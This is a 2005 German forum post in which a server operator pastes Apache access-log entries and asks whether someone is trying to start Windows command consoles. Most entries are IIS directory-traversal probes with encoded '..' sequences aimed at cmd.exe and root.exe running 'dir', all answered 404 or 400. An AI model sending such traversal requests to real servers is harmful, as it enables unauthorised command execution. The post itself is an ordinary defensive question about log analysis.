Wurm oder Hack ?
Posted: 2005-01-31 14:11
Hoi forumleser
Ich hatte bisher keine Probleme mit meinem Server aber als ich heute in die Access.log des Apachen guggte fand ich folgendes.
die letzten 3 sind klar das sind robots. Aber der rest ist mir unklar.
Da versucht jmd die Kommando konsolen von M$ zu starten ?
Ich hatte bisher keine Probleme mit meinem Server aber als ich heute in die Access.log des Apachen guggte fand ich folgendes.
Code: Select all
212.202.181.207 - - [30/Jan/2005:00:33:53 +0100] "GET /vwar/news.php HTTP/1.1" 404 1247 "http://dean2win.freeserverhost.com/disturbed/index.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 968 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 968 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
68.142.251.151 - - [30/Jan/2005:10:23:06 +0100] "GET /robots.txt HTTP/1.0" 404 1048 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.251.194 - - [30/Jan/2005:10:23:06 +0100] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.65.97.133 - - [30/Jan/2005:21:41:44 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
Da versucht jmd die Kommando konsolen von M$ zu starten ?